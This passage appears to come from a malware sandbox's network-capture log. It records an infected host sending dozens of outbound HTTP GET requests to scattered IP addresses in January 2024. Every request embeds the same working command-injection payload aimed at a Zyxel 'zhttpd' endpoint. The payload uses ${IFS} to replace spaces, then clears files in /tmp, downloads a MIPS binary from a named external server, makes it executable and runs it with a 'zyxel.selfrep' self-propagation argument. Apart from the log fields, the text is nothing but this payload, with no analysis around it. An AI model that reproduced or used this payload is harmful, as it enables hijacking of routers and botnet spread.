                                        Jan 14, 2024 16:18:48.544126034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5340192.168.2.13390502.70.48.71443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.544179916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5341192.168.2.133889860.102.176.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.544217110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5342192.168.2.135065825.88.203.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.544245005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5343192.168.2.1358086150.103.179.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.544292927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5344192.168.2.1339626125.26.219.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.544322014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5345192.168.2.134323435.251.226.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.544368982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5346192.168.2.1337840203.216.201.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.544411898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5347192.168.2.1358392155.207.251.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.544469118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5348192.168.2.1335184181.107.253.140443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.544498920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5349192.168.2.134695414.181.126.131443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.544529915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5350192.168.2.1334672194.83.155.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.544581890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5351192.168.2.135543296.153.41.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.544615984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5352192.168.2.1346376159.187.132.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.544656992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5353192.168.2.133505858.222.199.228443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.544689894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5354192.168.2.133773896.167.207.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.544750929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5355192.168.2.135128085.16.93.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.544781923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5356192.168.2.1337888188.14.154.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.544823885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5357192.168.2.133390495.102.253.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.544877052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5358192.168.2.1334068101.38.151.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.544918060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5359192.168.2.1339726116.2.27.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.544959068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5360192.168.2.133600476.213.88.228443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.545008898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5361192.168.2.136047418.120.250.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.545030117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5362192.168.2.1335002168.252.191.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.545057058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5363192.168.2.1350452212.184.107.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.545118093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5364192.168.2.1353600207.169.186.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.545157909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5365192.168.2.133962235.20.83.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.545178890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5366192.168.2.13332542.159.139.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.545238018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5367192.168.2.135191268.210.119.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.545300961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5368192.168.2.1349294190.31.80.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.545336962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5369192.168.2.1343844212.105.17.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.545382977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5370192.168.2.1350190171.195.187.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.545425892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5371192.168.2.1358610176.145.214.92443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.545469999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5372192.168.2.1350284194.50.122.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.545505047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5373192.168.2.133480688.5.49.68443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.545563936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5374192.168.2.135511647.83.18.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.545607090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5375192.168.2.1345494204.127.249.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.545656919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5376192.168.2.135816463.58.226.154443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.545680046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5377192.168.2.135222823.41.246.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.545732975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5378192.168.2.1354876165.237.12.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.545763969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5379192.168.2.135136050.201.152.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.545799971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5380192.168.2.135580490.255.122.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.545840979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5381192.168.2.135632264.42.190.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.545882940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5382192.168.2.1360848182.29.84.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.545934916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5383192.168.2.1357718145.115.47.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.545958042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5384192.168.2.1348494149.122.159.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.546013117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5385192.168.2.1339508185.230.155.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.546031952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5386192.168.2.133466273.99.135.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.546077013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5387192.168.2.1349218145.72.129.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.546125889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5388192.168.2.134683637.71.204.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.546150923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5389192.168.2.135504225.207.212.104443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.546207905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5390192.168.2.1333748165.6.155.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.546245098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5391192.168.2.1341850175.97.214.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.546266079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5392192.168.2.1343864161.29.251.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.549207926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5393192.168.2.134254492.23.232.78443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.549540043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5394192.168.2.1359884137.85.187.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.558357000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5395192.168.2.134893425.207.247.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.558398008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5396192.168.2.1350858208.204.118.104443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.558417082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5397192.168.2.1345412196.99.113.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.558429956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5398192.168.2.133756425.165.125.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.558475018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5399192.168.2.135054413.99.125.185443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.558523893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5400192.168.2.1340422105.124.243.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.558551073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5401192.168.2.133962092.106.226.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.558621883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5402192.168.2.1350958184.56.40.73443
                                        TimestampBytes transferredDirectionData
